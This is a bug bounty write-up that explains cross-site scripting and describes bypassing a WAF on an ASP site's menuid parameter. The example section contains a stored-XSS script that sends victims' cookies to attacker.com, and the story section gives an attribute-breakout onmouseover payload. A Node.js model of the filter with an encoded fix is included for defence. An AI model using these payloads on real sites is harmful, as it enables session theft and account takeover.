STORY OF AN ENCODED XSS
Hi everyone, I hope you all are doing well and great! In this article we are going to talk about a weird XSS that I found in one of the most famous energy drink companies (you might have guessed it 😉).
Contents of this article:
1- What is XSS?
2- Story of Weird XSS.
So let’s begin our hacking journey.
#1.WHAT IS XSS?
Have you ever heard the term "JavaScript"? If yes, good; if not, it is simply a programming language most commonly run on the client side (in browsers like Firefox, Chrome, etc.). You have all visited websites with fancy looks, animations and so on. These things are possible because of JavaScript: it can read and modify the whole web page and manipulate it as the developer chooses.
That is very convenient for developers, since they can add design and functionality with ease via JavaScript. But ask yourself: what happens if someone else (an attacker) is able to get their own JavaScript code to run inside somebody else's website?
You might have guessed it 😉
Then that attacker's code runs in the victim's browser with the same power as the site's own scripts, and can change anything or do anything on the page without authorization.
This is how cross-site scripting works.
In general terms, cross-site scripting (XSS) is a web application vulnerability that lets an attacker inject their own script into a page that other users load, so that the script executes in the victim's browser in the context (origin) of the vulnerable site.
Now, by achieving XSS, the attacker can:
1- Change the content of the page.
2- Steal cookies (when the session cookie is not marked HttpOnly).
3- Redirect users.
4- Deliver malware.
5- Send requests to the site as the logged-in victim.
and so on…
Let’s see one example:
#Example:
Suppose Facebook's comment functionality were vulnerable to XSS. The attacker visits some famous personality's page (let's say Ronaldo) and comments on his latest post:
<script>document.location.href="https://attacker.com/?cookie=" + document.cookie</script>
Because the comment is stored and shown to everyone, this script runs in the browser of every person who views Ronaldo's post and sends their cookies to the attacker. With a stolen session cookie the attacker can take over the victim's account. (This only works when the session cookie is not marked HttpOnly, which keeps it out of document.cookie; that flag is exactly what limits this kind of payload.)
In this case, everyone who sees Ronaldo's latest post becomes a victim and can lose their account to the attacker. And since Ronaldo is a very famous personality, millions of users could be compromised by just the one comment above!
Now I hope you understand what XSS is and why it is one of the most dangerous vulnerabilities out there.
To learn more about xss, you can visit this website:
Let’s jump to our story 😄
#2. Story of the weird XSS
In September, I started hunting on a private bug bounty program that had everything in scope. So I began my recon process and started looking for some common vulnerabilities like open redirection, CSRF, etc. In 2–3 days I found 9 vulnerabilities in the company and reported all of them. But unfortunately all of them were flagged either as Duplicate or Not Applicable.
The next day, I started testing a new web application which was running on an ASP server. I tried to find some hidden parameters using tools like FFUF and ParamSpider and found a menuid parameter. I captured the request in Burp Suite and tried injecting a normal <script>alert(1)</script> tag, but it was protected and redirected me to a NotFound.aspx page. I was about to give up, but then I thought of adding only <> in the parameter's value; the result was still the same 😑
Then I thought, let's URL-encode the special characters and see what happens. I encoded < to %3c and > to %3e and, to my surprise, it got rendered!!
Then I tried to inject <script>alert(1)</script> again, but it didn't work. It seemed like the back end was checking for some harmful tags to prevent XSS. After some time, I found that when I added "/" in the payload, it triggered the WAF and redirected me to the NotFound page.
On digging deeper, I found that the payload was being reflected inside a div tag, something like this:
<div menuid="reflected_data"></div>
Then I tried to check which values were reflected on the page, and I found:
"" → Reflected
<> → Reflected
/ → Blocked
<anything between tags> → Blocked
<anything → Reflected
>anything → Reflected
By analyzing the web page's behavior, I concluded that we cannot use any tags, since they will be blocked right away. So our only target is JavaScript event handlers like onmouseover, onclick, etc.
So I crafted the payload below using the above information:
batman" onmouseover=alert(1)>
If I pass this value in the parameter, it will close the string, allowing me to add an event handler like this:
<div menuid="batman" onmouseover=alert(1)> "> </div>
And BOOM! It was reflected and I got the scary alert(1) pop-up! 😁😁
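As an added example (this is not code from the original post, and the target's real source was never published), here is a small Node.js model of the filtering and reflection behaviour described above, next to a hardened rendering. The two-layer filter is an assumption reconstructed from the probe results: an outer check that rejects a raw < or > before decoding, and an inner check on the decoded value that rejects / and any non-empty <…> pair. All function names are hypothetical. What it demonstrates is that a blocklist in front of an attribute reflection cannot be made safe: a single " is enough to leave the attribute value, and HTML-attribute-encoding the value at the output point closes the hole whatever the WAF lets through.

```javascript
// Added example, not the original post's code. Models the filter behaviour
// reported in the write-up; the rules and their layering are an ASSUMPTION
// reconstructed from the probe table, and every name here is hypothetical.

// Outer layer (assumed): inspects the raw, still URL-encoded query value and
// rejects a literal < or >. This is why a raw "<>" was sent to NotFound.aspx
// while "%3c%3e" got through.
function outerFilterAllows(rawValue) {
  return !/[<>]/.test(rawValue);
}

// Inner layer (assumed): inspects the decoded value and rejects "/" and any
// non-empty <...> pair. Matches "<anything between tags> -> Blocked" and
// "/ -> Blocked", while "<>", "<anything" and ">anything" pass.
function innerFilterAllows(decodedValue) {
  if (decodedValue.includes("/")) return false;
  return !/<[^<>]+>/.test(decodedValue);
}

// Vulnerable rendering: the value is concatenated straight into a quoted
// attribute, so one " ends the attribute and the rest is parsed as markup.
function renderVulnerable(menuid) {
  return '<div menuid="' + menuid + '"></div>';
}

// Hardened rendering: HTML-attribute-encode the value at the output point.
// & < > " ' are the characters that can change meaning inside a quoted attribute.
function encodeAttr(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}
function renderHardened(menuid) {
  return '<div menuid="' + encodeAttr(menuid) + '"></div>';
}

// Simulated request handling: WAF checks the raw value, the app decodes it,
// the inner check runs on the decoded value, then the page is rendered.
function handleRequest(rawMenuid, render) {
  if (!outerFilterAllows(rawMenuid)) {
    return { status: 302, location: "/NotFound.aspx" };
  }
  const decoded = decodeURIComponent(rawMenuid);
  if (!innerFilterAllows(decoded)) {
    return { status: 302, location: "/NotFound.aspx" };
  }
  return { status: 200, body: render(decoded) };
}

// Tester's check on the response: did the input close the menuid attribute
// and start a new on* event-handler attribute on the same div?
function attributeBreakout(html) {
  return /<div menuid="[^"]*"\s+on\w+\s*=/i.test(html);
}

// Constructed probes, following the sequence in the write-up.
const PROBES = {
  rawScript: "<script>alert(1)</script>",
  rawBrackets: "<>",
  encodedBrackets: "%3c%3e",
  encodedScript: encodeURIComponent("<script>alert(1)</script>"),
  encodedBreakout: encodeURIComponent('batman" onmouseover=alert(1)>'),
};

// Runs every probe through both renderers and reports the outcome.
function demo() {
  return Object.entries(PROBES).map(([name, raw]) => {
    const v = handleRequest(raw, renderVulnerable);
    const h = handleRequest(raw, renderHardened);
    return {
      probe: name,
      status: v.status,
      vulnerableBody: v.status === 200 ? v.body : v.location,
      vulnerableBreakout: v.status === 200 && attributeBreakout(v.body),
      hardenedBreakout: h.status === 200 && attributeBreakout(h.body),
    };
  });
}

console.log(demo());
```

Run it with node and compare the two breakout columns: the encoded payload reaches the page unchanged through the vulnerable renderer, while the hardened one emits menuid="batman&quot; onmouseover=alert(1)&gt;" with the WAF untouched in both cases. That is the practical lesson for the developer side of this bug: fix the output context and treat the blocklist as defence in depth at most.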
I reported this issue to the company right away and, in gratitude, they rewarded me with a tray of their energy drinks!!
Takeaways:
1- Never give up.
2- Analyze the web response and attack according to it.
3- Follow the road less traveled.
4- Never stop learning.
5- Try adding special characters and see how the response changes.
That's it for this article. I hope you learned something new from it. Let me know if you have any doubts regarding this article or XSS 😄
We'll meet again in the next article. Till then!
LinkedIn Account: https://www.linkedin.com/in/faiyaz-ahmad-64457520b/
Twitter Account: https://twitter.com/FaIyaZz007
UPDATE: If anyone is interested in hacking Windows with just Python, they can enroll in the course below for free! Just use "FEBHACK" as the coupon.
Course Link: https://www.udemy.com/course/hacking-windows-with-python-from-scratch-2022/?referralCode=1647ED5816EFD5D2F2EB